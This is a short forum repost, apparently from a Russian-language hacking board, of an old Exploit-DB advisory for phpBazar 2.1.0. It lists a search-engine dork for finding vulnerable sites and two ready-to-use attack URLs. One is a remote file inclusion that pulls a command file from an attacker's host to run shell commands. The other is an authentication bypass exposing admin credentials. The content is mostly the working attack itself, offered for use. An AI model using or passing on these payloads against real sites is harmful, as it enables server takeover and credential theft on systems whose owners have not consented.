Exploit phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1804
Проверка EDB
  1. Пройдено
Автор
[OO]
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2528 cve-2006-2527
Дата публикации
2006-05-19
Код:
Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# milw0rm.com [2006-05-19]
 
Источник
www.exploit-db.com

Похожие темы